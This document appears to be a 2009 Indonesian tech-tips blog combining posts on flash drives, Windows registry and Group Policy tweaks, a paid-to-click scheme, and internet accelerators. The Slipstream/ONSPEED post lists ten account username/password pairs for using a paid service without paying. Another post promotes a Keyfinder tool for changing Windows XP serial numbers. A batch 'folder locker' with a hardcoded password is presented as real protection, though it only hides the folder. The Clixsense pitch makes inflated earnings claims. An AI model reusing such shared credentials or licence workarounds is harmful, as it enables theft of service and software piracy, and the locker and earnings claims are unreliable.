Tapi masalahnya kalo kita males nginstall ulang windows, gunain aja Aplikasi Keyfinder buatan Jelly
Bean yang bisa buat merubah serial number windows Xp, so gak perlu cape- cape nginstall ulang.
Download Keyfinder disini :
http://unrated.110mb.com/keyfinder.zip
SELAMAT BEREXPERIMEN KALO DAH BERHASIL JANGAN LUPA KLIK IKLAN YAH DI BAGIAN MENU TAMBAHAN DI BLOGKU INI....HEHHEEE
Memperbaiki Flash Disk Yang Rusak
Untuk meperbaikinya silahkan ikuti step-step berikut ini.
Download HP Drive Boot Utility sebesar 45 Mb di www.4shared.com, Software ini mendukung untuk Flash Disk yang bukan keluaran HP.
Install software tersebut
Tancapkan flashdisk yang bermasalah ke dalam komputer.
Jalankan software dan pilihlah drive tempat flash disk anda.
Pilih Creae New or Replace Existing Configuration
Sekarang coba cek flash disk anda. Wah sekarang punya flashdisk lagi dong
TIPS DAPAT $ DI CLIXSENSE?
Clixsense adalah sebuah program affiliasi yang sangat simple, sangat sederhana & sangat mudah untuk dijalankan, dan yang paling penting untuk mendaftar di clixsense Anda tidak akan dipungut biaya seperserpun alias GRATIS !
Clixsense bisa dijadikan tambahan penghasilan dalam bisnis online Anda sambil anda browsing di internet, dimanapun anda dan kapanpun program ini bisa dijalankan. dan tentu saja pendapatan yang cukup lumayan untuk Anda.
Cara Kerja ?
Clixsense adalah salah satu program bisnis yang paling baru yang akan membayar anda untuk melakukan klik URL iklan yang mereka tampilkan. Untuk satu iklan hanya dibutuhkan waktu sekitar 30 detik. satu iklan dihargai sekitar $0.01 hingga $5.
Ada 2 jenis member yaitu Standar dan Premium.
apa perbedaanya ? Perbedaanya adalah, untuk member biasa atau standar ( member yang melakukan pendaftaran/ sign up secara gratis ), iklan yang di tampilkan perharinya hanya 2-5 iklan saja. Tapi jika Premium member iklan yang akan di tampilkan 200 - 300 iklan yang harus Anda klik / di kunjungi, hanya saja kita harus membayar 10 $ untuk menjadi member Premium. Pembayaran via paypal dan bisa juga dengan google cek.
Program ini sangat cocok sekali bagi anda yang suka browsing dan ber-internet atau memiliki sedikit waktu untuk mendapatkan penghasilan dari internet. secara perhitungan sangat menguntungkan, karena jika dihitung secara logika dan dipraktekkan sebagai berikut :
1 iklan 30 detik dan kita di bayar 0.01 - 5 $, kita pilih yang per iklan $0.01 saja berarti patokan dari 1 klik adalah 0.01$ jika kita meluangkan waktu sehari 2 jam berarti dapat dihitung 2 jam = 120 menit x 2 (60 dtk / 30 dtk) = 240 Klik. jika dihitung 0.01 $ berarti dalam sehari = 2.4 / 2Jam. Jika dikalikan sebulan 2.4 x 30 = 72 $ lumayan bukan.
Disamping itu juga anda akan mendapatkan penghasilan lagi jika Anda bisa mendapatkan referal sebesar 10% dari orang yang mendaftar. dan mendapatkan 50% jumlah $ dari orang yang menjadi member premium melalui referal anda.
Pengiriman cek bisa diset dibagian profile. akan dikirim setelah mencapai 10 $ atau bisa diset menjadi 20$, $50, 100$.. %500 atau jumlah tertentu yang ada pada situs clixsense
Saya tidak akan berbasa-basi kepada Anda, silahkan lihat bukti cek dari clixsense dibawah ini:
contoh Cek dari Clixsense :
Anda mungkin sudah mengenal bisnis online semacam Google Adsense, tapi tidak sedikit yang mengalami kegagalan dalam menjalankannya karena Google Adsense mempunyai peraturan yang sangat ketat bahkan bisa dibilang Adsense adalah bisnis yang beresiko paling tinggi & tidak sedikit para publisher baik dari Indonesia maupun luar negeri yang tiba-tiba account Adsense-nya di disable/banned oleh Google dengan berbagai alasan dimana kita dituduh telah melakukan klik instant atau apalah & yang pasti program Clixsense ini tidak akan pernah membuat Anda kecewa karena sama sekali tidak ada resikonya, bahkan Anda malah disuruh melakukan klik iklan mereka !
Dan untuk menjadi member clixsense Anda tidak perlu membuat website/blog.
Bagaima apakah Anda akan menyia-nyiakan kesempatan baik ini, atau Anda sudah sangat tidak sabar dan tertarik untuk segera bergabung?anda boleh langsung klik disini lalu klik register atau gambar dibawah ini:
GRATIS!
Selamat berburu $$$!
Thursday, July 23, 2009
ONSPEED
- Melakukan accelerate compress dan uncompress data
- Melakukan accelerate speed web browsing, sending dan receiving emails
- Compress data menjadikan kecepatan internet anda meningkat ;
a. Dial-up sampai dengan 10X lebih cepat
b. Broadband sampai dengan 5X lebih cepat
c. GPRS sampai dengan 8X lebih cepat - Compatible pada PC Windows, Machintosh, dan PocketPC (PDA)
- Bekerja pada semua akses jaringan internet (ISP) di seluruh dunia
- Penting bagi client internet berbasis Quota data; dengan biaya Rp/Kb sama, anda dapat download data sampai dengan 10X lebih banyak
- Penting bagi client internet berbasis waktu; dengan biaya Rp./detik sama, anda dapat download data lebih banyak dan lebih cepat
- Hemat bandwith, irit bandwith
maka akan saya share hasil penelusuran yg saya dapatkan.he..
buat yang mau nyoba ONSPEED gratisan bisa download softwaernya disini, setelah ONSPEED terinstall silahkan liat disini buat dapetin username dan passwordnya.
Untuk mengecek bahwa browser anda telah memakai ONSPEED :
Internet Explorer : klik tools - internet options - connections - lan settings
Firefox : Tools - option - advance - settings
Opera 9 : Tools - preference - advanced - network - proxy server
HTTP Proxy: 127.0.0.1 Port 5405
SSL Proxy: direct Port 0
FTP Proxy: 127.0.0.1 Port 5405
Gopher Proxy: 127.0.0.1 Port 5405
SOCKS Host: direct Port 0
buat cara install dan setting ONSPEED bisa liat disini
Selamat mencoba, mudah-mudahan bermanfaat ..
CARA MENGGUNAKAN SLIPSTREAM:
- Buka ONSPEED yang sudah mati dan rubah username & passwordnya menjadi: WINDOWS
- Install Slipstream ke komputer anda dan secara otomatis ONSPEED akan tertimpa oleh Slipstream
- Rubah setingan proxy pada browser anda
Firefox :
menu tools - option - tab advanced - network - setting - manual proxy - http proxy : 127.0.0.1 - port : 5400
Opera :
menu tools - preferences - tab advanced - network - proxy server - http : 127.0.0.1 - port : 5400 - buka Slipstream, isi username dan password slipstream dengan salah satu pilihan dibawah ini:
Username: trkVyGDMFK
Password: 76664613
Username: trf8tKjvhG
Password: 43392161
Username: trB6dXsBnG
Password: 96723686
Username: trfvdpH2hC
Password: 43721997
Username: trVyDzekSV
Password: 41637953
Username: tr7neEcZR2
Password: 86125449
Username: trSrvysGyp
Password: 24487753
Username: tr4tegSXrq
Password: 94366429
Username: trhzZc1Z5r
Password: 37871328
Username: tr65UXYhzu
Password: 26244938
Sekarang anda tidak perlu lagi bolak balik masuk google untuk mencari kata kunci "Account ONSPEED", "Password ONSPEED" atau "Username ONSPEED" (hayooo..ketauan kan suka nyari-nyari yang gratisan)
selamat mencoba ya..Semoga Membantu...
Download Slipstream
yang dibutuhkan untuk memakai Slipstream hanyalah account trial ONSPEED yang sudah mati.
untuk mendownload Slipstream silahkan klik disini
Cara Merawat Flashdisk
Selain kualitas, mahal tidaknya flash disk juga tergantung dengan besarnya kapasitas yang tersedia, semakin besar kapasitasnya semakin mahal pula harganya. Memang sih, harga flash disk cenderung menurun dibanding dulu ketika pertama kali di luncurkan, tapi harga sebuah flash disk tidak bisa dikatakan murah lho. Nah biar flash disk kita awet, benda yang biasanya berukuran kecil dan berwarna lucu ini juga harus di rawat lho. Bukan cuma karena harganya yang relatif mahal tapi juga biar data-data penting yang tersimpan didalamnya lebih aman. Well, berikut ini ada tips bagaimana merawat dan menggunakan flash disk dengan benar, antara lain :
1. Jauhkan Dari Medan Magnet Kuat
Barang-barang elektronik seperti tv dan handphone sangat tidak baik untuk flash disk. Untuk itu jangan pernah menyimpannya di dekat barang-barang sejenis yang memiliki kekuatan magnet besar. Terkadang kita sering lupa jika meletakkan flash disk dan hand phone di tempat sama dalam tas. Nah mulai saat ini, kalau pingin flash disk kamu berumur panjang, jangan lagi menyimpannya di tempat sama ya?!
2. Jangan Terkena Air
Meski ada beberapa merk yang mengklaim waterproof, menjauhkan flash disk dari sentuhan air tetap saja menjadi langkah yang paling aman. Daripada data kamu hilang, mendingan tidak ambil resiko kan?
3. Virus Scan
Saat Pengambilan data atau pemindahan dari dari pc ke flash disk, sangat mungkin bukan hanya data yang ikut berpindah tapi juga virus-virus yang terdapat dalam komputer. Apalagi kalau kita mengambil dan menyimpan data dari internet. Waduh flash disk kamu bisa dipenuhi virus-virus pengganggu. Makanya, jangan lupa untuk melakukan ritual scan virus secara berkala dengan software anti virus yang tersedia.
4. Proses Eject atau Stop/ Safety Remove
Selalu melakukan proses eject atau stop sebelum mencabut flash disk dari port usb. Selain bisa menjadikan flash disk rusak, tidak melakukan proses eject atau stop juga dapat mempengaruhi file-file data yang kamu simpan di dalamnya lho.
5. Jauhkan Dari Tempat Panas
Semua barang elektronik tak terkecuali flash disk sangat rentan dengan yang namanya panas. Apalagi terkena sinar matahari langsung. Jadi usahakan tidak menyimpannya ditempat yang panas dan terkena sinar matahari langsung. Misalnya seperti meninggalkan flash disk di mobil.
6. Hindari Benturan Keras
Coba rasain kalau kamu jatuh dari lantai 12, kamu bisa jadi harus masuk rumah sakit atau bahkan masuk ke rumah masa depan. Begitu juga dengan flash disk. Jadi jagalah flash disk kamu baik-baik dari benturan keras ya.
7. Tutuplah selalu.
Udara dan lingkungan kita penuh dengan debu dan kotoran. Jika socket flash disk kita kotor maka dapat mengakibatkan proses baca tulis sering gagal. Makanya selalu tutup biar nggak kotor, jangan malah diilangin tutupnya!
8. Minimalisir proses hapus-tulis
Sama seperti kita, flash disk juga memiliki usia lho. Artinya suatu saat flash disk kita bisa mati dan tidak bisa digunakan lagi. Usia flash disk berbeda-beda, tergantung kualitas dan merk dari flash disk itu sendiri. Biasanya usia flash disk antara 10.000-100.000 kali proses hapus tulis. Jadi usahakan untuk meminimalisir proses tersebut dan juga mengedit langsung dari flash disk.
9.selesai..
Mengunci Folder Tanpa Software
Pertama, buka notepad/wordpad di komputer yang ada dihadapan anda .
Ke dua, paste code di bawah ini :
@ECHO OFF
titipan kunci folder
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius kamu mau kunci ??(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Foldernya dah terkunci
goto End
:UNLOCK
echo Masukkan pasword dulu
set/p “pass=>”
if NOT %pass%== deaky goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Foldernya berhasil di buat
goto End
:End
Ke tiga, simpan dengan nama folderLocker.bat
Petunjuknya :
Klik 2 kali folderLocker.bat, kemudian muncul folder yang namanya Locker. Setelah itu silakan isi folder itu dengan file-file yang ingin kamu protect. Klik 2 kali lagi folderLocker.bat untuk mengunci Locker. Nanti muncul confirm, ketik Y ato N untuk mengkonfirmasi. Locker berganti nama jadi Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} kalo diklick langsung shortcut ke Control Panel bukan masuk ke Folder Locker. Untuk membuka kuncinya klik 2 kali lagi folderLocker.bat, ntar kamu disuruh masukin passwordnya. Ketik “deaky” lalu Enter. tring… Folder terbuka kembali...!!!
Bukan sulap bukan sihir… cukup mudah kan? Tapi cara ini ada kelemahannya, folder bisa di-delete. Jadi hati-hati jangan sampe orang lain men-delete folder itu. Wah.. bisa kacau urusannya.selamat mencoba...
Cara Shutdown Komputer dengan Klik Kanan
mengerti cara membuat serta menggunakannya? Silahkan cermati petunjuk ringkas yang menarik ini dan praktekkanlah dengan cara mengetikkannya pada editor kesayangan anda.
Cobalah salin script program berikut ini dengan menggunakan Notepad lalu simpan dengan
nama KomputerTidur.js, kemudian ubah Save as type yang tadinya Text Documents (*.txt)
menjadi All Files.
Agar tidak terjadi kesalahan pada saat pengetikkan program alangkah baiknya jika fasilitas
Word Wrap yang ada di Notepad di nonaktifkan terlebih dahulu sebelum pengetikan script
program.
// Program Sederhana Matiin Komputer Via Klik Kanan
var vbCancel = 2;
var vbYesNoCancel = 3;
var vbYes = 6;
var vbNo = 7;
var vbQuestion = 32;
var vbInformation = 64;
var natan = WScript.CreateObject('WScript.Shell');
var kata = '.:: http://ikatama.wordpress.com ::.';
var pesan1 = 'Pilihlah opsi berikut ini:\n'+
'--------------------------\n\n'+
'1. Klik ["Yes"] -> untuk Pasang.\n'+
'2. Klik ["No"] -> untuk Copot.\n'+
'3. Klik ["Cancel"] -> untuk Berhenti.\n\n'+
'>> Pilihan Anda? <<' var tanya = natan.popup(pesan1,0,kata,vbYesNoCancel+vbQuestion); if (tanya == vbYes) { natan.RegWrite('HKCR\\Directory\\shell\\mati\\', '> Matikan Windows!','REG_SZ');
natan.RegWrite('HKCR\\Directory\\shell\\mati\\command\\',
'shutdown.exe -s -t 0','REG_SZ');
natan.RegWrite('HKCR\\Drive\\shell\\mati\\',
'> Matikan Windows!','REG_SZ');
natan.RegWrite('HKCR\\Drive\\shell\\mati\\command\\',
'shutdown.exe -s -t 0','REG_SZ');
pesan2 = 'Selesai di pasang!';
natan.popup(pesan2,0,kata,vbInformation);
}
else if (tanya == vbNo)
{
natan.RegDelete('HKCR\\Directory\\shell\\mati\\command\\');
natan.RegDelete('HKCR\\Directory\\shell\\mati\\');
natan.RegDelete('HKCR\\Drive\\shell\\mati\\command\\');
natan.RegDelete('HKCR\\Drive\\shell\\mati\\');
pesan3 = 'Selesai di copot!';
natan.popup(pesan3,0,kata,vbInformation);
}
else
{
pesan4 = 'Berhenti!';
natan.popup(pesan4,0,kata,vbInformation);
}
Carilah file yang bernama KomputerTidur.js. Kemudian Klik dua kali pada ikon file tersebut
untuk menjalankannya. Program diatas juga dapat dijalankan melalui Command Prompt
dengan mengetikkan perintah: cscript KomputerTidur.js.
Cara melihat perubahannya yaitu cobalah klik kanan di Start Menu, atau di salah satu drive
maupun folder yang terdapat di Windows Explorer. Disana anda akan melihat sebuah shortcut
yang dapat anda klik untuk menonaktifkan komputer.
Jika tidak menginginkan shorcut tersebut tampil di Start Menu atau Windows Explorer,
silahkan klik tombol No untuk menghapusnya.
Tetapi jika tidak ada keinginan untuk mengeksekusi program tersebut, silahkan klik tombol
Cancel untuk keluar.
Program diatas sangat aman dan telah diujicoba di sistem operasi Windows XP Professional
Service Pack 2. Sangat mudah dan cepat bukan? Selamat menggunakan..
Cara Mengunci Wallpaper
Agar wallpaper kita tidak bisa diubah, maka kita harus menghilangkan akses ke dua tahapan diatas.
Untuk menghilangkan akses ke tahap pertama berikut langkah-langkahnya:
1. Klik start >> run >> ketikan gpedit.msc
2. masuk ke user configuration >> administrative templates >> start menu and taskbar >> klik dua kali prevent changes to taskbar and start menu settings >> pilih enable >> ok
untuk mengetesnya coba klik kanan pada taskbar,Untuk menghilangkan akses ke tahap kedua berikut langkah-langkahnya:
1. klik start >> run >> ketikan gpedit.msc
2. masuk ke user configuration >> administrative templates >> desktop >> active desktop >> klik dua kali active desktop wallpaper >> pilih enable >> masukan wallpaper name [ beserta path-nya ] >> pilih wallpaper type terserah anda >> ok.
untuk mengetesnya coba klik kanan gambar yang ingin dijadikan wallpaper kemudian klik kanan >> set as desktop background, maka tidak akan terjadi perubahan pada wallpaper anda. Selamat mencoba
Cara Kerja Virus
- File infector virus: memiliki kemampuan untuk melekatkan diri (attach) pada sebuah file, yang biasanya merupakan file executable. Pada umumnya virus jenis ini tidak menyerang file data. Namun dewasa ini, sebuah file data atau dokumen lainnya dapat mengandung kode executable seperti macro, yang dapat dieksploitasi oleh pencipta virus komputer, worms atau trojan horse.